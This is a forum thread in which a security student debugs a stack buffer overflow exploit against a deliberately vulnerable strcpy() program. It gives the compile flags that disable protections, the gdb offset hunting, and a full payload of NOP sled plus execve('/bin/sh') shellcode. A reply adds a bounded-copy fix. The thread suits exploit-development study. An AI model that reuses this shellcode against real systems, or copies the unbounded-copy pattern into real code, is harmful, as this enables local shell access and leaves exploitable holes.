Buffer overflow

Hi guys,

So this post will be a little different and is a pretty fun topic. As you may or may not know, I'm a cyber security / computer science student. I'm doing a project on buffer overflows and exploit dev showing how buffer overflows can occur with insecure C functions such as strcpy() and gets(), but I seem to be having great difficulty actually executing my shellcode.

I created a vulnerable program named example.c; here is the source code below:

#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]){

  char buffer[256];
  strcpy(buffer, argv[1]);   /* unbounded copy: the deliberate overflow under study */
  printf("%s \n", buffer);
  return 0;
}


I've been trying to solve this solution for two days. I messaged a friend on reddit who has been helping me out with it, and we have managed to make some progress on it. To begin with, I'm using a Linux Ubuntu 16.02 64 bit machine. I turned off ASLR, as I know without turning this safeguard off the exploit will not work. I also compiled my program as a 32 bit program and turned off the stack protector.

Here are the compile options I specified: gcc -o example -fno-stack-protector -m32 -z execstack example.c

The program compiles fine and I fire up gdb to debug (to learn about how the exploit works). I set a breakpoint just after the strcpy function is called, then run the program with the following command: run $(python -c "print('A' * 260)"). This is where the seg fault happens and I get the address 0x41414141. This is what I'm looking for, but I then try another run to see if it is indeed overwriting the return address; if it is, I should get 0x42424242 printed out, so I run $(python -c "print('A' * 256 + 'BBBB')"). Negative: 0x41414141 is returned again. So I then run the program again with the same breakpoint and examine the return address with the x/24wx $ebp+4 command. This will show me the contents of the return address, and nope, it has not been overwritten. I keep on incrementing until I see the return address is overwritten. Here is the point at which it does: run $(python -c "print('A' * 268 + 'BBBB')")

http://pasted.co/8d085c99 As you can see by this paste, both the ebp and return address have been overwritten, but when the program gets a seg fault it returns a normal looking address. It should return 0x42424242, so something strange is happening.

I then decide to try to run my shellcode anyway: run $(python -c "print('\x90' * 222 + '\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' + '\x20\xcb\xff\xff')") and something indeed does happen, so the shellcode must be getting executed, but not in the correct way. Instead a path shows up and random characters get printed:

������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1��F1�1�̀�[[1��C��C

��S
�����/bin/sh����

Program received signal SIGSEGV, Segmentation fault.
0x0804848f in main ()
Does anybody have any idea what may be happening and how I can get the exploit to run?

Also, this is the link to the video I'm following: https://www.youtube.com/watch?v=hJ8IwyhqzD4

Thanks
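For contrast with the strcpy() version above, here is an added example (not code from the original post or from the video it follows) showing the same example.c with the copy bounded to the size of the 256-byte buffer. copy_bounded() rejects any input that would not fit, copy_truncating() shows the snprintf() alternative that always leaves the buffer NUL-terminated, and the two helpers bounded_accepts() and truncated_length() are assumed names that build a constructed 'A' * N input like the post's python one-liner so the behaviour at the 255/256 boundary can be checked without a debugger.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFSZ 256   /* same size as the post's buffer[256] */

/* Bounded replacement for the post's strcpy(buffer, argv[1]):
 * refuses the copy if src (plus its terminating NUL) does not fit.
 * Returns 0 on success, -1 if the input was rejected; dst is untouched on -1. */
int copy_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (dstsz == 0 || n >= dstsz)
        return -1;
    memcpy(dst, src, n + 1);   /* n + 1 copies the NUL as well */
    return 0;
}

/* Truncating alternative: snprintf() never writes past dstsz and always
 * NUL-terminates. Returns 1 if the input was cut short, 0 if it fit. */
int copy_truncating(char *dst, size_t dstsz, const char *src)
{
    int needed = snprintf(dst, dstsz, "%s", src);
    return needed < 0 || (size_t)needed >= dstsz;
}

/* Assumed helper: build a constructed input of `len` 'A' bytes (like the
 * post's python -c "print('A' * N)") and report whether copy_bounded()
 * accepts it into a BUFSZ-byte buffer (1 = accepted, 0 = rejected). */
int bounded_accepts(size_t len)
{
    char buffer[BUFSZ];
    char *input = malloc(len + 1);
    if (!input)
        return -1;
    memset(input, 'A', len);
    input[len] = '\0';
    int rc = copy_bounded(buffer, sizeof buffer, input);
    free(input);
    return rc == 0;
}

/* Assumed helper: same constructed input through copy_truncating();
 * returns the string length that actually ends up in the buffer. */
size_t truncated_length(size_t len)
{
    char buffer[BUFSZ];
    char *input = malloc(len + 1);
    if (!input)
        return 0;
    memset(input, 'A', len);
    input[len] = '\0';
    copy_truncating(buffer, sizeof buffer, input);
    size_t out = strlen(buffer);
    free(input);
    return out;
}

int main(int argc, char *argv[])
{
    char buffer[BUFSZ];

    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    if (copy_bounded(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "input too long: %zu bytes, max %zu\n",
                strlen(argv[1]), sizeof buffer - 1);
        return 1;
    }
    printf("%s\n", buffer);
    return 0;
}
```

Compiled with the same flags as the post (gcc -o example -fno-stack-protector -m32 -z execstack), the 268-byte input that overwrote the saved return address in the original is now refused before any copy happens, and no amount of padding reaches the frame. The gap the post found between 260 and 268 bytes is padding gcc places between the array and the saved frame pointer; that layout is compiler-dependent, which is exactly why the fix is a length check against sizeof buffer rather than any assumption about where the buffer ends.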

Recompile with -g if you want to debug in gdb:

gcc -o example -g -fno-stack-protector -m32 -z execstack example.c
Thanks CCPA, I'll give it a shot.